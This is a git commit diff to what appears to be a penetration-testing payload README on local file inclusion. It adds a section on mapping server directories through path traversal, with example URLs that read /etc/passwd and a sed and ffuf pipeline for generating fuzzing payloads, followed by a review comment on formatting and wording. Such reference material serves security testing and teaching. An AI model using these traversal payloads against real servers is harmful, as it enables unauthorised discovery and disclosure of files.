Update README.md
This commit is contained in:
parent
abb9bcb43f
commit
211fa80c12
@ -109,6 +109,35 @@ Maybe the back-end is checking the folder path:
http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd
```

### Identifying folders on a server

Depending on the applicative code / allowed characters, it might be possible to recursively explore the file system by discovering folders and not just files. In order to do so:
- identify the "depth" of you current directory by succesfully retrieving `/etc/passwd` (if on Linux):
```
http://example.com/index.php?page=../../../etc/passwd # depth of 3
````
- try and guess the name of a folder in the current directory by adding the folder name (here, `private`), and then going back to `/etc/passwd`:
```
http://example.com/index.php?page=private/../../../../etc/passwd # we went deeper down one level, so we have to go 3+1=4 levels up to go back to /etc/passwd
```
- if the application is vulnerable, there might be two different outcomes to the request:
- if you get an error / no output, the `private` folder does not exist at this location
- if you get the content from `/etc/passwd`, you validated that there is indeed a `private`folder in your current directory

- the folder(s) you discovered using this techniques can then be fuzzed for files (using a classic LFI method) or for subdirectories using the same technique recursively.

It is possible to adapt this technique to find directories at any location in the file system. For instance, if, under the same hypothesis (current directory at depth 3 of the file system) you want to check if `/var/www/` contains a `private` directory, use the following payload:
```
http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd
```

The following sequence of commands allows the generation of payloads using `sed` (1) as input for url fuzzing tools such as `ffuf` (2):
```
$ sed 's_^_../../../var/www/_g' /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt | sed 's_$_/../../../etc/passwd_g' > payloads.txt
$ ffuf -u http://example.com/index.php?page=FUZZ -w payloads.txt -mr "root"
```
Of course, adapt there payloads to your needs in terms of depth / location / input directory list.

### **Path truncation**

Bypass the append of more chars at the end of the provided string (bypass of: $\_GET\['param']."php")
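Review bot: the fence that closes the first payload block under "Identifying folders on a server" (the line right after `http://example.com/index.php?page=../../../etc/passwd # depth of 3`) is written with four backticks while every other fence in the hunk uses three; in rendered markdown the mismatched fence does not close the block, so the `private` bullet and the rest of the list get swallowed into it. Make it three backticks. While here, fix the typos in the added text: `you current directory` should read `your current directory`, `succesfully` should read `successfully`, `` `private`folder `` is missing a space, `this techniques` should read `this technique`, and `adapt there payloads` should read `adapt these payloads`. One content point: the existence oracle in the "error / no output" bullet only works because the server refuses to resolve a path whose `private/..` component is not on disk, which is why the first bullet is scoped with "(if on Linux)"; stating that assumption in the text, next to the two outcomes, would stop readers from treating "error / no output" as meaningful where the application normalises the path before it reaches the filesystem.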